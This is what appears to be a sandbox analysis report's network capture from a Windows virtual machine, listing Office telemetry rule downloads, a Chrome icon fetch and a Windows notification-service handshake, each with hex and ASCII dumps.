                                                                                                                            2024-10-06 11:50:12 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            62192.168.2.64980113.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                            x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115012Z-1657d5bbd48xdq5dkwwugdpzr0000000027000000000c0us
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            63192.168.2.64979913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                            x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115012Z-1657d5bbd48dfrdj7px744zp8s00000001q0000000008cc1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            64192.168.2.649804104.17.247.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC390OUTGET /ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svg HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:12 UTC551INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Content-Type: image/svg+xml
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"d3-qgAfOZqw+DN474sa0ZhgYMZOPHQ"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRW7JNTREHM3DMM1WNEQJ3W6-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17870952
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56eba2912429b-EWR
                                                                                                                            2024-10-06 11:50:12 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 69 6f 6e 69 63 6f 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 3e 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 34 38 22 20 64 3d 22 4d 33 32 38 20 31 31 32 4c 31 38 34 20 32 35 36 6c 31 34 34 20 31 34 34 22 20 63 6c 61 73 73 3d 22 69 6f 6e 69 63 6f 6e 2d 66 69 6c 6c 2d 6e 6f 6e 65 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                            Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="ionicon" viewBox="0 0 512 512"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="48" d="M328 112L184 256l144 144" class="ionicon-fill-none"/></svg>
                                                                                                                            2024-10-06 11:50:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            65192.168.2.64980340.113.110.67443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 66 62 4a 55 71 36 42 45 46 6b 53 36 6e 74 67 32 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 64 34 33 64 31 63 63 61 34 37 36 30 65 0d 0a 0d 0a
                                                                                                                            Data Ascii: CNT 1 CON 304MS-CV: fbJUq6BEFkS6ntg2.1Context: ddd43d1cca4760e
                                                                                                                            2024-10-06 11:50:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                            2024-10-06 11:50:13 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 66 62 4a 55 71 36 42 45 46 6b 53 36 6e 74 67 32 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 64 34 33 64 31 63 63 61 34 37 36 30 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 6e 6d 72 33 6f 67 68 45 39 4c 59 70 46 4f 50 43 45 70 44 30 37 6f 43 4e 4b 35 55 35 31 50 53 57 58 5a 6a 76 38 53 66 74 57 65 42 65 42 74 6a 64 36 65 6e 32 32 77 50 53 67 4e 36 79 72 51 32 46 69 45 67 53 66 66 61 6a 42 7a 49 5a 79 4e 6d 36 59 48 69 63 61 65 63 4b 37 39 48 33 66 2f 71 50 45 79 32 77 6c 70 75 72 4b 6c 33 66 58
                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: fbJUq6BEFkS6ntg2.2Context: ddd43d1cca4760e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYnmr3oghE9LYpFOPCEpD07oCNK5U51PSWXZjv8SftWeBeBtjd6en22wPSgN6yrQ2FiEgSffajBzIZyNm6YHicaecK79H3f/qPEy2wlpurKl3fX
                                                                                                                            2024-10-06 11:50:13 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 66 62 4a 55 71 36 42 45 46 6b 53 36 6e 74 67 32 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 64 64 34 33 64 31 63 63 61 34 37 36 30 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                            Data Ascii: BND 3 CON\WNS 0 196MS-CV: fbJUq6BEFkS6ntg2.3Context: ddd43d1cca4760e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                            2024-10-06 11:50:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                            2024-10-06 11:50:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 37 6e 6c 32 36 35 58 6f 45 47 45 53 78 77 4e 34 78 6d 45 43 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                            Data Ascii: MS-CV: h7nl265XoEGESxwN4xmECw.0Payload parsing failed.


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            66192.168.2.64980613.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:13 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                            x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115013Z-1657d5bbd48cpbzgkvtewk0wu000000001wg00000000hcp9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            67192.168.2.64980513.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:13 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                            x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115013Z-1657d5bbd48jwrqbupe3ktsx9w000000023000000000b8xd
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            68192.168.2.64980713.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:13 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                            x-ms-request-id: d112c6a6-a01e-000d-2160-17d1ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115013Z-1657d5bbd48dfrdj7px744zp8s00000001r0000000006wx3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:13 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            69192.168.2.64980913.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:13 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 428
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                            x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115013Z-1657d5bbd48gqrfwecymhhbfm800000000r000000000b6td
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:13 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            70192.168.2.64980813.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:13 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:13 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 404
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                            x-ms-request-id: f57b7c9f-801e-00a0-4a13-172196000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115013Z-1657d5bbd48dfrdj7px744zp8s00000001p000000000a5gw
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
